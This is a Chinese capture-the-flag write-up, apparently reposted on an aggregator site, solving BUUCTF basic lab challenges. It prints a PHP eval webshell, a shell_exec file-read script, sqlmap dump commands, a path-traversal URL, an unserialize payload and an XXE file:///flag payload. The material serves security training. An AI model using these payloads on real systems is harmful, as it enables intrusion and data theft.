【网络安全CTF】BUUCTF(Basic篇)

这篇具有很好参考价值的文章主要介绍了【网络安全CTF】BUUCTF(Basic篇)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Linux Labs

解题思路:已给用户名密码,直接用ssh工具连接即可获取flag
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
查找flag在跟下
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
提交完成。

BUU LFI COURSE 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
访问链接:为php代码审计题,看题目要求构造GET请求读取文件
http://9a7d4988-99f9-4c29-88d8-600e19887723.node4.buuoj.cn:81/?file=/…/…/flag
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

Upload-Labs-Linux 靶场

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
访问链接:为uploab-labs靶场,这个共有20关过一关可获取flag。
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
选择第一关:查看代码发现为前端js限制文件类型,这种直接使用抓包进行绕过
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
准备shell木马文件:

<?php @eval($_POST['caidao']);?>

修改扩展名为.jpg 或.png或.gif
文件上传抓包:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
修改扩展名为php
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
文件存放位置:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
使用蚁剑链接
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
成功获取flag,其他关卡不在说明,通关思路都为上传绕过。

BUU BRUTE 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
一个登陆框:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
随便输入账号密码:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
提示用户名错误:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
试试常用用户名admin、root、administrator等
发现使用admin作为用户名,提示密码为四位数字。
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
使用暴力破解:
使用字典生成器生成4位数密码:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
密码破译为:6490

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

BUU SQL COURSE 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
明显的sql注入
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
使用sqlmap直接爆数据库
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全加参数 -dbs
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -dbs
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
其中news和test比较显眼,查news数据库
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news --tables
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
查看admin表内字段

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin --columns
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin -C id,password,username --dump
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

BUU CODE REVIEW 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
代码审计:

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
代码片段:

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);  //高亮显示代码

class BUU {
   public $correct = ""; //定义全局变量
   public $input = "";//定义全局变量

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());  //uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID,base64_encode为转换为bash64编码
           if($this->correct === $this->input) {  /判断两个属性是否全等
                   echo file_get_contents("/flag");  //若全等,则打印根目录下的flag
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') { //判断pleaseget==='1'&&pleasepost==='2'&&md1!=md52&&md5(md51)==md5(md52)
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

第二段代码get参数简单为

http://IP/?pleaseget=1

第一段代码使用空数组绕过,给POST参数

pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

sqli-labs

参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?spm=1001.2014.3001.5501

BUU UPLOAD COURSE 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
上传实验
这里我传的docx的文件,可以看到变成了jpg的格式
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
并看不到文件内容
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
使用抓包工具修改包:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
尝试连接:

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

测试连接失败:
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

既然能够执行php那我们直接写一个php打印flag即可。

<?php
$output = shell_exec('cat /flag');
echo "<pre>$output</pre>";
?>

上传直接访问即可拿到flag
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

BUU BURP COURSE 1

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
打开后直接显示只能本地访问,本地ip的由X-Forwarded-For和X-Real-IP进行构建
这里是使用的X-Real-IP构建的
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

BUU XXE COURSE 1

XXE漏洞是外部实体注入攻击
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全
用burp抓包,这里是个xml的提交
【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全

我们在这定义了一个实体 xxe,它将指向/flag 文件,然后我们在 XML 数据中使用 &xxe; 引用这个实体,这样攻击者就可以将该文件中的内容读取到 HTTP 响应中。

<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///flag">
]>
<root>
  <username>&xxe;</username>
  <password>test</password>
</root>

【网络安全CTF】BUUCTF(Basic篇),靶场,安全,web安全文章来源地址https://www.toymoban.com/news/detail-644537.html

到了这里,关于【网络安全CTF】BUUCTF(Basic篇)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码,然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。 接下来,代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值,并进行字符串替换,将 php:// 替换为空字符串 这是为了防止通过 URL 参数加载本地文件或其他可

    2024年02月08日
    浏览(48)
  • CTF网络安全大赛介绍

    CTF竞赛模式分为以下三类: 一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏

    2024年02月13日
    浏览(49)
  • 网络安全CTF工具合集

    各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合 逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hopper – Hopper - Download nm – unix/linux tool objdump – lin

    2024年02月06日
    浏览(50)
  • CTF网络安全大赛详情

    网络安全已成为现代社会的一个关键挑战,随着互联网技术的飞速发展,从个人隐私保护到国家安全,网络安全的重要性日益突显。为了应对这一挑战,CTF(Capture The Flag,中文:夺旗赛)应运而生,成为全球网络安全领域中一种非常流行的信息安全竞赛形式。 CTF赛事起源与

    2024年04月26日
    浏览(93)
  • 网络安全常用靶场推荐

    sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:XSS Challenges (by yamagata21) - Stage #1 xss-labs

    2024年02月12日
    浏览(49)
  • 网络安全、夺旗赛(CTF)技能汇总_ctf夺旗赛

    本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、夺旗赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。 资料篇 CTF Wiki 对CTF整体介绍,各个方向的介绍,有例题,入门必备。 CTF工具集合 集成了工具资源,方便下载。 如果你对网络安全入门感兴

    2024年02月07日
    浏览(51)
  • 【web-ctf】ctf_BUUCTF_web(2)

    1. [RCTF2015]EasySQL 考点: 二次注入 报错注入 正则表达式查找 reverse函数 学到的知识点: 二次注入原理 二次注入的标志: (1)可以自行注册用户 (这是为了注册一些特殊的用户名到数据库中(比如会导致之后报错、修改其他用户的密码等)) (2)可以使用修改密码等 (二

    2024年02月06日
    浏览(44)
  • 网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你

    目录 前言 一、内容简介 二、读者对象  三、专家推荐  四、全书目录   CTF比赛是快速提升网络安全实战技能的重要途径,已成为各个行业选拔网络安全人才的通用方法。但是,本书作者在从事CTF培训的过程中,发现存在几个突出的问题: 1)线下CTF比赛培训中存在严重的

    2024年02月08日
    浏览(51)
  • (蓝宝书)网络安全——CTF那些事儿

    欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号 《机器和智能》 回复 “python项目

    2024年02月08日
    浏览(93)
  • 网络安全:CTF入门必备之题型介绍

    CTF 题目类型一般分为 Web 渗透、RE 逆向、Misc 杂项、PWN 二进制漏洞利用、Crypto 密码破译。 在传统的CTF线上比赛中,Web类题目是主要的题型之一,相较于二进制、逆向等类型的题目,参赛者不需掌握系统底层知识;相较于密码学、杂项问题,不需具特别强的编程能力,故入门

    2024年02月10日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包